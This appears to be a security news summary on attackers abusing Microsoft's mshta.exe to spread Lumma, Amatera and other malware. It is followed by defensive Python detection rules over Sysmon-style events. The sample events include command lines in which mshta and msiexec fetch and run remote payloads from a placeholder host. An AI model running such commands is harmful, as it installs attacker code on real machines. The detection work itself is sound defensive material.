www.securityweek.com 5/19/2026, 1:30:38 PM

MSHTA abuse spreads Lumma, Amatera stealers via phishing

Primary source: bitdefender.com

Attackers are increasingly abusing Microsoft's legacy MSHTA utility (mshta.exe) to silently deliver stealers, loaders and persistent malware through phishing, fake software downloads and LOLBIN-based attack chains, according to Bitdefender. Since the start of this year there has been a dramatic rise in MSHTA-related activity, and Bitdefender notes that the uptick reflects increased threat actor use rather than any renewed administrative adoption of the tool.

The report highlights campaigns delivering the Lumma and Amatera stealers via HTA loaders, including one Lumma operation that lured victims through social media posts and SEO-poisoned sites offering "free software"; there, the HTA run by mshta.exe loads a Python interpreter that contacts the C2 server. Other MSHTA-driven campaigns have delivered ClipBanker and PurpleFox, with PurpleFox allegedly invoking msiexec from an MSHTA command line to fetch an MSI package disguised as a PNG image.

Experts emphasise that social engineering remains a central facet of these attacks, and recommend blocking legacy binaries and strengthening pre-execution and runtime protections. 19 May 2026.
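As an added example (not code from the Bitdefender report or this article), the following Python detection logic runs over constructed Sysmon-style process-creation events and flags the three stages of the chain described above: mshta.exe fetching remote content, mshta.exe spawning an interpreter or installer (the Python loader and msiexec cases), and msiexec.exe installing a remote package whose name hides the .msi extension. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); all hosts and paths are placeholders.

```python
import re
from urllib.parse import urlparse

# Matches an http(s) URL anywhere in a command line.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Interpreters/installers an HTA loader has no business spawning on a workstation.
SUSPICIOUS_CHILDREN = {"msiexec.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def exe(path):
    """Lower-cased file name of an image path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of the detection rules a process-creation event matches."""
    hits = []
    image, parent = exe(ev["Image"]), exe(ev.get("ParentImage", ""))
    urls = URL_RE.findall(ev.get("CommandLine", ""))
    # Rule 1: mshta.exe pulling its HTA/script body from a remote location.
    if image == "mshta.exe" and urls:
        hits.append("mshta_remote_content")
    # Rule 2: mshta.exe spawning an interpreter or installer (Python loader, msiexec chains).
    if parent == "mshta.exe" and (image.startswith("python") or image in SUSPICIOUS_CHILDREN):
        hits.append("mshta_spawns_interpreter")
    # Rule 3: msiexec.exe installing a remote package not named *.msi (e.g. a fake .png).
    if image == "msiexec.exe" and any(not urlparse(u).path.lower().endswith(".msi") for u in urls):
        hits.append("msiexec_remote_nonmsi_package")
    return hits

def scan(events):
    """Map event index -> matched rules, for events that matched at least one rule."""
    findings = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings[i] = hits
    return findings

# Constructed sample events (Sysmon Event ID 1 fields); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Tools\admin_dashboard.hta"'},                   # benign local HTA
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/free_software.hta"},         # remote HTA
    {"Image": r"C:\Users\Public\py\python.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "python.exe loader.py"},                                        # Python from HTA
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "msiexec.exe /q /i http://example.invalid/images/logo.png"},   # MSI as PNG
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"msiexec.exe /i C:\Temp\app.msi /qn"},                         # benign install
]
```

Running `scan(SAMPLE_EVENTS)` flags events 1, 2 and 3 and leaves the two benign events unreported; on real telemetry, pair rule 1 with an allow-list of locally signed HTAs to keep the noise down.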


Article by CyberSIXT
